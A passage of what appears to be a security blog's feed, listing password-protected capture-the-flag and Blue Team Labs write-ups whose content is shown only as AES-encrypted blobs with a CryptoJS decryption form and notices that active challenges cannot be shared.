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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-23T16:27:08-04:002022-03-23T16:27:08-04:00Eric Turnertag:blog.ericturner.it,2022-03-23:/2022/03/23/hackthebox-gamepwn-challenge-cubemadness1/

This is currently an active challenge/machine on HackTheBox. Per their ToS, active writeups are not allowed to be shared. In order to unlock this content, you will need to provide the final flag.

<div id="pec-encrypted-content" style="display:none">mou3JpLnMtamF4oHPOh+Xg==;3ZSWV6LQaEOaYiEvCyN5SZRkl3fLhFudz9YYPidh+ZMQXr5VcF4bMqpn2MtiG+6UkSKDb2UsZ5EfaB0C/Cok4DdQIwSNOiCQ8ElajQlKTj6pUP/u5H3D4GvEYRsnXcyMXGEJT9zNEXkrGIl6mhQvFLa9alqI1Ws053c/xuWtcMNvsUgpGeO0O1yBoRj8Bu85RHhp3SrzN1w2wRD+m+iw/9aAI73XMxgYRoSAswziYvBDmFJ/cqi7JWiNKJP+bq0PrctCD18SxbIdP3YOgS6HKkpgc8dUJ1YUSLT+nWshmnOy49OO/iORk17MNes0MARbnvRmweq+hGcqAaCJ//xSSV+N+MdMAZoLVf1yZPxfBsscaauZGg8j8vEApcM/oHIbG7Xglrlo5Qj4F1IpP37uf1g1F66UZj9ankwIkAxeY/+pZQ1uEnHhoJy5F1FvAfuSdi9nHabN3V7IAUJ2faUtcHjDDTX/9mIHQ+ahHY6IJ9R+iUgmLSsjVHBqOHdLgrlO1yL+zGsvevfZKKN+q3Ko1Uw/bdwSsEcTChU32SnnO0GJOHUnaUNC4g8l8YcR3jAfGbIHUYYHqL17gMS86g2jgIj7uuT7Iu9KDwxkzeGFdQWn9bg352l2UC2FLjfNh+tRIvv2kgVkXNkygu2yHHPvB55M+PjDuykxaRk9XHU9PpbE44rkoWtIAjJh2prXz3i2b9DyEybxskDwpn+fIrOGcoZUVFwPs6uV5beloBXAsjsa7K4yqDTtzT804D7c9B3Yhdt2UBJM+T3kZNYDFmy/mku7sy5fqlh/3I0bgyqoRcUbeTDniRqSrL9SCJG4npYin2C6ZxjPzTZqeLp0COMlej0MN8JJqildfbpmGLRVxiZ5FukVK7aFYKtfw9zY1FEf0WYpmVd8jUXDGid5H+90D0BruQusbw2O5LdGPQnSmE/qeTonIRQ0HjR5wQo7j8iYKl9Yed+T6Mg7y93pUd6w/P8iEVID0zT4b6dyc7BMJEkf6iLGJB1PdaWqijqgI+ptb1KJ4sdYkcpcswy+N3Lr0eKg/WY+Pc4pVoXl/mxX9mGIHBPteenP0cijRIRdUd1/FUTh+Pi7wt3pN76DlWRn14h4HaaPd399aoVhkb13DUx2YE0C6eC+t8WTP33bS1hD8TFsRBY+ZMpNgxp8kiqpmVCWh0tVuOoA5Vgf4NMZR1fACJFPSuxUk8DhFatRd+OtSFyVkZ9hpx3rCYodhBo5U/guWGpMgnidz9Xf/uIFTBdOUPnwROw+NY/YEIltss0br0sNqoexBZhU6gZW5N3Ks1aoeNb25CwZ5kMxmfgbKiORUhL7YjM01ErH65UCshla/s0Cum49VT7zzmm/Dytp5dvwKceCsx4iovtOwMcHHpY4jwdtEcs04ElzTMidqtb2tak+VrUIgfF70MtnQM8yThO2CFp1RikBnL2XcLVUsE5A0ixBTgcZNrD3GvGhxKxteFv7hMNb3sDfeQvjuXm9OrFxGrwP2QvzY8hoRpd+guwxisxxmli/E4NvXmrnPBgfI0YtlFjlonwt09UGsp5Dzb3YFcMeFUJWau4UIOesnFG1qLAU3snVEpr/HGxvOStL5x/YUpPgKIdiK3Fq6W7HRkf46l7e//N9JeSFy3wD1JUOwnhEGArCyoBBJxTNTRCCTAPnGkckp6dmsZbXlyBZtcPDttcJVW5DCrLAtM7qEDZOmJku6JaJrEADMV8ZNNDbwFXnh8Bmdfl0mjYq6VSKXYVwMWhbrsDW33AdAlwj61WxCxcS9s7mGGQHMcqxAczJ1xNy7RcawSrqbH7RmLyPL7bsdJxEiEbC7Qpsm1V2dC0=;^</div> <div id="pec-decrypted-content"> <h4><i>This is currently an active challenge/machine on HackTheBox. Per their ToS, active writeups are not allowed to be shared. In order to unlock this content, you will need to provide the final flag.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-22T14:28:50-04:002022-03-22T14:28:50-04:00Eric Turnertag:blog.ericturner.it,2022-03-22:/2022/03/22/btlo-investigation-crypto/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">6GGWAA/1Ua2W6Y/Att44WA==;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